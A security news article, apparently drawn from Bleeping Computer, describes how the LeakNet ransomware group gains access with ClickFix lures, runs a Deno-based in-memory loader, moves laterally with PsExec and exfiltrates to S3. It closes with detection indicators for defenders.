LeakNet Ransomware’s Stealthy New Attack Methods Revealed

A sophisticated ransomware group known as LeakNet has refined its attack strategy, employing a clever combination of social engineering and legitimate software to infiltrate corporate networks. Security researchers have detailed a new method where the group uses the ClickFix social engineering technique for initial access, followed by a novel malware loader built on the open-source Deno runtime. This approach allows malicious code to run directly in system memory, significantly reducing the digital footprints left on a hard drive and making detection by traditional security tools much more difficult.

The LeakNet operation, which emerged in late 2024, has been linked to approximately three victim organizations per month. Analysts warn that this rate could increase with the adoption of these more stealthy tactics. The ClickFix method is not unique to LeakNet; other ransomware gangs like Termite and Interlock also use it. The technique deceives users into executing harmful commands on their computers through counterfeit system prompts and dialogue boxes.

In this specific campaign, the ClickFix lure results in the deployment of a loader script that leverages Deno. Deno is a fully legitimate and signed runtime environment for JavaScript and TypeScript, typically used by developers. Because it is a trusted application, it easily bypasses security filters designed to block unknown or suspicious binaries. Security firm ReliaQuest has labeled this a “bring your own runtime” (BYOR) attack, where attackers weaponize a legitimate tool to avoid suspicion.

Instead of creating a custom loader likely to trigger alerts, the threat actors simply install the authentic Deno executable and use it to run their malicious scripts. In observed incidents, this process was initiated through cleverly named Visual Basic and PowerShell scripts, such as `Romeo.ps1` and `Juliet.vbs`. Using Deno for direct in-memory execution is a critical stealth advantage, as the activity blends in with normal developer tasks and leaves minimal forensic evidence behind.

Once activated, the malicious code performs reconnaissance on the infected host, creates a unique identifier for the victim machine, and establishes contact with a remote command-and-control server. It then retrieves a second-stage payload while simultaneously initiating a persistent loop to await further instructions from the attackers.

Following successful infiltration, LeakNet employs a range of post-exploitation techniques to expand its reach within a network. These include DLL sideloading through a Java process, continuous beaconing to command servers, and credential discovery using system enumeration commands. The group moves laterally across the network using tools like PsExec and stages payloads while exfiltrating stolen data, often by misusing cloud storage services such as Amazon S3 buckets.

Despite the sophistication of this attack chain, its consistent and repeatable nature provides opportunities for detection. Defenders are advised to monitor for several strong indicators of a potential LeakNet intrusion. Key warning signs include the Deno runtime executing outside of expected development environments, suspicious `misexec` commands originating from web browsers, and abnormal usage of the PsExec tool. Additionally, unexpected outbound network traffic to Amazon S3 storage and DLL files being loaded from unusual directories should be investigated immediately as potential evidence of this stealthy ransomware activity.

(Source: Bleeping Computer)